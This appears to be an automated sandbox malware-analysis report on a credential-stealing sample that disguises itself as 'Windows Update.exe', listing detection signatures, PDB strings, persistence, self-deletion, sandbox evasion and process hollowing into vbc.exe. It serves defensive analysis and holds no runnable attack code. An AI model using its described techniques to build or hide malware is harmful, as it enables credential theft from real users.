          Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.343602667.000000000083F000.00000004.00000020.sdmp
          Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5.exe, 00000001.00000003.263698625.0000000014AD0000.00000004.00000001.sdmp, 5.exe, 00000001.00000003.263528153.0000000014940000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.303805285.00000000149D0000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.300117905.0000000014840000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: wntdll.pdb source: 5.exe, 00000001.00000003.263698625.0000000014AD0000.00000004.00000001.sdmp, 5.exe, 00000001.00000003.263528153.0000000014940000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.303805285.00000000149D0000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.300117905.0000000014840000.00000004.00000001.sdmp
          Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmp, vbc.exe, 0000000F.00000000.329440107.0000000000400000.00000040.00000001.sdmp, vbc.exe, 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp
          Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: mscorlib.pdbAA source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: DDsymbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbf source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: oC:\Windows\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp

          Data Obfuscation:

          Yara detected MSIL Injector
          Source: Yara match File source: 00000014.00000002.416445221.0000000005EE0000.00000004.00000001.sdmp, type: MEMORY
          .NET source code contains potential unpacker
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\5.exe Code function: 1_2_6F1E2E45 push ecx; ret 1_2_6F1E2E58
          Source: C:\Users\user\Desktop\5.exe Code function: 2_2_00401F16 push ecx; ret 2_2_00401F29
          Source: C:\Users\user\Desktop\5.exe Code function: 2_2_00C52900 push esi; ret 2_2_00C5290A
          Source: C:\Users\user\Desktop\5.exe Code function: 2_2_00C52BBA push cs; ret 2_2_00C52BDA
          Source: C:\Users\user\Desktop\5.exe Code function: 2_1_00401F16 push ecx; ret 2_1_00401F29
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 6_2_6F712E45 push ecx; ret 6_2_6F712E58
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_00401F16 push ecx; ret 10_2_00401F29
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_00AC33B9 push es; ret 10_2_00AC33BA
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_00AC2BBA push cs; ret 10_2_00AC2BDA
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_00AE2A04 push ss; retn 0072h 10_2_00AE2A36
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_00AE7F6A push eax; ret 10_2_00AE7F75
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_1_00401F16 push ecx; ret 10_1_00401F29
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 15_2_00411879 push ecx; ret 15_2_00411889
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 15_2_004118A0 push eax; ret 15_2_004118B4
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 15_2_004118A0 push eax; ret 15_2_004118DC
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 16_2_00442871 push ecx; ret 16_2_00442881
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 16_2_00442A90 push eax; ret 16_2_00442AA4
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 16_2_00442A90 push eax; ret 16_2_00442ACC
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 16_2_00446E54 push eax; ret 16_2_00446E61
          Source: C:\Users\user\Desktop\5.exe Code function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405C49
          Source: C:\Users\user\Desktop\5.exe File created: C:\Users\user\AppData\Roaming\Windows Update.exe
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe File created: C:\Users\user\AppData\Local\Temp\nsw2209.tmp\rgsbzeog.dll
          Source: C:\Users\user\Desktop\5.exe File created: C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe File created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update

          Hooking and other Techniques for Hiding and Protection:

          Deletes itself after installation
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe File deleted: c:\users\user\desktop\5.exe
          Changes the view of files in windows explorer (hidden files and folders)
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 15_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_0040F64B
          Source: C:\Users\user\Desktop\5.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\5.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process information set: NOGPFAULTERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Function Chain: memAlloc,deviceIO,deviceIO,threadCreated,threadResumed,threadDelayed,threadDelayed,networkSend,deviceIO,threadDelayed,threadDelayed,networkSend,deviceIO,threadDelayed,keyValueQueried,threadDelayed,keyValueQueried,keyValueQueried,systemQueried,threadDelayed,keyValueQueried,processSet,processSet,sectionLoaded,sectionLoaded
          Source: C:\Users\user\Desktop\5.exe TID: 4620; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\5.exe TID: 5796; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6276; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6600; Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6608; Thread sleep time: -140000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6628; Thread sleep time: -300000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6928; Thread sleep time: -180000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 7124; Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 7124; Thread sleep time: -1100000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 7124; Thread sleep time: -100000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 16_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary
          Source: C:\Users\user\Desktop\5.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Thread delayed: delay time: 300000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Thread delayed: delay time: 180000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Thread delayed: delay time: 120000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Thread delayed: delay time: 140000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Thread delayed: delay time: 100000
          Source: Windows Update.exe, 0000000A.00000002.383634625.0000000000768000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.343320969.0000000000768000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.351665012.0000000000768000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOO
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 16_2_004161B0 memset,GetSystemInfo
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_00405C22 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_00402630 FindFirstFileA
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_2_00404A29 FindFirstFileExW
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_1_00404A29 FindFirstFileExW
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_2_00404A29 FindFirstFileExW
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_1_00404A29 FindFirstFileExW
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 15_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 16_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 16_2_00407E0E FindFirstFileW,FindNextFileW,FindClose
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_6F1F2402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_6F1F2706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_6F1F2744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_6F1F2616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_6F1F26C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_1_004035F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 6_2_6F722402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 6_2_6F722744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 6_2_6F722706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 6_2_6F722616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 6_2_6F7226C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_2_004035F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_1_004035F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_6F1E1793 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_2_004067FE GetProcessHeap
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_2_02557920 LdrInitializeThunk
          Source: C:\Users\user\Desktop\5.exe; Memory allocated: page read and write | page guard
          Source: C:\Users\user\Desktop\5.exe; Code function: 1_2_6F1E2A02 SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_2_00401E1D SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_1_00401E1D SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\5.exe; Code function: 2_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 6_2_6F712A02 SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_2_00401E1D SetUnhandledExceptionFilter
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_1_00401E1D SetUnhandledExceptionFilter
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 10_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

          HIPS / PFW / Operating System Protection Evasion:

          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\5.exe; Memory written: C:\Users\user\Desktop\5.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Users\user\AppData\Roaming\Windows Update.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
          .NET source code references suspicious native API functions
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
          Source: 2.2.5.exe.4b20000.15.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
